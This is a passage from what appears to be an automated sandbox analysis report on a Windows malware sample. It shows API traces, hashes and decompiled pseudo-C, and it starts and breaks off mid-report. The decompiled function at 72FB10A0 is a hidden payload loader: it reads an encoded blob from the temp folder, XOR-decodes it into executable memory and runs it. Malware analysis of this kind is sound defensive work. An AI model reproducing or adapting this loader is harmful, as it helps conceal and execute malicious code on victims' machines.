                        • Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,00007DE4), ref: 004031E8
                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
                      • WriteFile.KERNELBASE(0040B038,0040CE57,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
                      • SetFilePointer.KERNELBASE(0003D90C,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: File$Pointer$CountTickWrite
                      • String ID: 80A$hM
                      • API String ID: 2146148272-943072739
                      • Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                      • Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
                      • Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                      • Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 450 401f51-401f5d 451 401f63-401f79 call 4029e8 * 2 450->451 452 40200b-40200d 450->452 461 401f88-401f96 LoadLibraryExA 451->461 462 401f7b-401f86 GetModuleHandleA 451->462 453 402156-40215b call 401423 452->453 460 40287d-40288c 453->460 464 401f98-401fa6 GetProcAddress 461->464 465 402004-402006 461->465 462->461 462->464 467 401fe5-401fea call 404e23 464->467 468 401fa8-401fae 464->468 465->453 472 401fef-401ff2 467->472 470 401fb0-401fbc call 401423 468->470 471 401fc7-401fde call 72fb10a0 468->471 470->472 478 401fbe-401fc5 470->478 476 401fe0-401fe3 471->476 472->460 474 401ff8-401fff FreeLibrary 472->474 474->460 476->472 478->472
                      C-Code - Quality: 57%
                      			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t25;
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
					_t29 = _t18;
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404E23(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t25 = GetModuleHandleA(_t31); // executed
				_t29 = _t25;
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                      0x00401f51
                      0x00401f51
                      0x00401f56
                      0x00401f5d
                      0x0040200b
                      0x00402156
                      0x00402156
                      0x0040287d
                      0x00402880
                      0x0040288c
                      0x0040288c
                      0x00401f6c
                      0x00401f76
                      0x00401f79
                      0x00401f88
                      0x00401f8c
                      0x00401f92
                      0x00401f96
                      0x00402004
                      0x00000000
                      0x00402004
                      0x00401f98
                      0x00401fa2
                      0x00401fa6
                      0x00401fea
                      0x00401fa8
                      0x00401fab
                      0x00401fae
                      0x00401fde
                      0x00401fb0
                      0x00401fb3
                      0x00401fbc
                      0x00401fbe
                      0x00401fbe
                      0x00401fbc
                      0x00401fae
                      0x00401ff2
                      0x00401ff9
                      0x00401ff9
                      0x00000000
                      0x00401ff2
                      0x00401f7c
                      0x00401f82
                      0x00401f86
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                        • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                        • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                        • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                        • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                        • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                      • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                      • String ID: ?B
                      • API String ID: 2987980305-117478770
                      • Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                      • Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
                      • Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                      • Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 480 4015b3-4015c6 call 4029e8 call 40560c 485 4015c8-4015e3 call 4055a3 CreateDirectoryA 480->485 486 40160a-40160d 480->486 493 401600-401608 485->493 494 4015e5-4015f0 GetLastError 485->494 487 40162d-40215b call 401423 486->487 488 40160f-401628 call 401423 call 405a85 SetCurrentDirectoryA 486->488 502 40287d-40288c 487->502 488->502 493->485 493->486 497 4015f2-4015fb GetFileAttributesA 494->497 498 4015fd 494->498 497->493 497->498 498->493
                      C-Code - Quality: 85%
                      			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E0040560C(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E004055A3(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                      0x004015b3
                      0x004015ba
                      0x004015bd
                      0x004015c2
                      0x004015c6
                      0x004015c8
                      0x004015d0
                      0x004015d6
                      0x004015d8
                      0x004015db
                      0x004015e3
                      0x004015f0
                      0x004015fd
                      0x004015fd
                      0x004015f2
                      0x004015f3
                      0x004015fb
                      0x00000000
                      0x00000000
                      0x004015fb
                      0x004015f0
                      0x00401600
                      0x00401603
                      0x00401605
                      0x00401606
                      0x004015c8
                      0x0040160d
                      0x0040162d
                      0x00402156
                      0x0040160f
                      0x00401611
                      0x0040161c
                      0x00401622
                      0x00401622
                      0x00402880
                      0x0040288c

                      APIs
                        • Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,74E5F560,004053BE,?,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,74E5F560), ref: 0040561A
                        • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
                        • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E
                      • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                      Strings
                      • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                      • String ID: C:\Users\user\AppData\Local\Temp
                      • API String ID: 3751793516-501415292
                      • Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                      • Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
                      • Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                      • Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040578B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 505 40578b-405795 506 405796-4057c0 GetTickCount GetTempFileNameA 505->506 507 4057c2-4057c4 506->507 508 4057cf-4057d1 506->508 507->506 509 4057c6 507->509 510 4057c9-4057cc 508->510 509->510
                      C-Code - Quality: 100%
                      			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                      0x0040578f
                      0x00405795
                      0x00405796
                      0x00405796
                      0x00405797
                      0x0040579e
                      0x004057a8
                      0x004057b5
                      0x004057b8
                      0x004057c0
                      0x00000000
                      0x00000000
                      0x004057c4
                      0x00000000
                      0x00000000
                      0x004057c6
                      0x00000000
                      0x004057c6
                      0x00000000

                      APIs
                      • GetTickCount.KERNEL32 ref: 0040579E
                      • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: CountFileNameTempTick
                      • String ID: "C:\Users\user\Desktop\nji3Lg1ot6.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                      • API String ID: 1716503409-332413507
                      • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                      • Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
                      • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                      • Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 72FB10A0, Relevance: 6.1, APIs: 4, Instructions: 93filememoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      C-Code - Quality: 76%
                      			E72FB10A0(void* __ecx, void* __eflags) {
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				void* _v28;
				long _v32;
				long _v36;
				short _v1076;
				void _v5848;
				void* _t35;
				intOrPtr _t38;
				struct _OVERLAPPED* _t70;
				void* _t78;

				E72FB1000(0x16d4, __ecx);
				_v24 = 0x70;
				_v22 = 0x61;
				_v20 = 0x77;
				_v18 = 0x67;
				_v16 = 0x6a;
				_v14 = 0x73;
				_v12 = 0x76;
				_v10 = 0x75;
				_v8 = 0;
				GetTempPathW(0x103,  &_v1076);
				E72FB1030( &_v1076,  &_v24);
				VirtualProtect( &_v5848, 0x12a1, 0x40,  &_v32); // executed
				_t35 = CreateFileW( &_v1076, 0x80000000, 7, 0, 3, 0x80, 0); // executed
				_v28 = _t35;
				ReadFile(_v28,  &_v5848, 0x12a1,  &_v36, 0); // executed
				_t70 = 0;
				while(1) {
					_t38 =  *((intOrPtr*)(_t78 + _t70 - 0x16d4));
					if(_t70 == 0x12a1) {
						break;
					}
					 *((char*)(_t78 + _t70 - 0x16d4)) = ((((_t38 - 0x00000001 + 0x54 ^ 0x00000005) + 0x00000001 - 0xffffffffffffff94 ^ 0x000000e9) + 0xfb - 0x00000001 + 0x00000017 ^ 0x00000098) + 0x00000053 - 0x0000001f ^ 0x91) - 0xcb;
					_t70 =  &(_t70->Internal);
				}
				_v5848();
				return 0;
			}





















                      0x72fb10a8
                      0x72fb10b2
                      0x72fb10bb
                      0x72fb10c4
                      0x72fb10cd
                      0x72fb10d6
                      0x72fb10df
                      0x72fb10e8
                      0x72fb10f1
                      0x72fb10f7
                      0x72fb1107
                      0x72fb1118
                      0x72fb1132
                      0x72fb1151
                      0x72fb1157
                      0x72fb1170
                      0x72fb1176
                      0x72fb117b
                      0x72fb117b
                      0x72fb1188
                      0x00000000
                      0x00000000
                      0x72fb11b2
                      0x72fb11b9
                      0x72fb11b9
                      0x72fb11cb
                      0x72fb11d2

                      APIs
                      • GetTempPathW.KERNEL32(00000103,?), ref: 72FB1107
                      • VirtualProtect.KERNELBASE(?,000012A1,00000040,?), ref: 72FB1132
                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 72FB1151
                      • ReadFile.KERNELBASE(?,?,000012A1,?,00000000), ref: 72FB1170
                      Memory Dump Source
                      • Source File: 00000000.00000002.295878216.0000000072FB1000.00000020.00020000.sdmp, Offset: 72FB0000, based on PE: true
                      • Associated: 00000000.00000002.295873811.0000000072FB0000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295896531.0000000072FB2000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72fb0000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: File$CreatePathProtectReadTempVirtual
                      • String ID:
                      • API String ID: 205760209-0
                      • Opcode ID: 12e095a8cb45485f49eb404071e3197b5a0e95d0326cb5ce4f7fdfc7da6cdb05
                      • Instruction ID: b17f98d16d46567d7659439a7d6b5928e9608641675a7d394b233a3ba5b1522b
                      • Opcode Fuzzy Hash: 12e095a8cb45485f49eb404071e3197b5a0e95d0326cb5ce4f7fdfc7da6cdb05
                      • Instruction Fuzzy Hash: 7E31C271E14208ABFB00CBB1DC51BEE7335EF14740F106468E309EB680E6795B02CB69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00401389, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43windowCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 603 401389-40138e 604 4013fa-4013fc 603->604 605 401390-4013a0 604->605 606 4013fe 604->606 605->606 608 4013a2-4013a3 call 401434 605->608 607 401400-401401 606->607 610 4013a8-4013ad 608->610 611 401404-401409 610->611 612 4013af-4013b7 call 40136d 610->612 611->607 615 4013b9-4013bb 612->615 616 4013bd-4013c2 612->616 617 4013c4-4013c9 615->617 616->617 617->604 618 4013cb-4013f4 MulDiv SendMessageA 617->618 618->604
                      C-Code - Quality: 69%
                      			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423ed0; // 0x4ded44
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}












                      0x0040138a
                      0x004013fa
                      0x00401392
                      0x0040139b
                      0x004013a0
                      0x00000000
                      0x00000000
                      0x004013a2
                      0x004013a3
                      0x004013ad
                      0x00000000
                      0x00401404
                      0x004013b0
                      0x004013b7
                      0x004013bd
                      0x004013be
                      0x004013c0
                      0x004013c2
                      0x004013b9
                      0x004013b9
                      0x004013ba
                      0x004013ba
                      0x004013c9
                      0x004013cb
                      0x004013f4
                      0x004013f4
                      0x004013c9
                      0x00000000

                      APIs
                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: DM
                      • API String ID: 3850602802-1917389839
                      • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                      • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                      • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                      • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004031F1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                      Download Yara Rule

                      Control-flow Graph

                      C-Code - Quality: 84%
                      			E004031F1(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				E00405CE3(_t6);
				_t2 = E004055E5(_t6);
				if(_t2 != 0) {
					E00405578(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040578B("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                      0x004031f2
                      0x004031f8
                      0x004031fe
                      0x00403205
                      0x0040320a
                      0x00403212
                      0x0040321e
                      0x00403224
                      0x00403208
                      0x00403208
                      0x00403208

                      APIs
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                        • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                        • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                      • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: Char$Next$CreateDirectoryPrev
                      • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                      • API String ID: 4115351271-1075807775
                      • Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                      • Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
                      • Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                      • Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00406481, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                      Download Yara Rule
                      C-Code - Quality: 99%
                      			E00406481() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
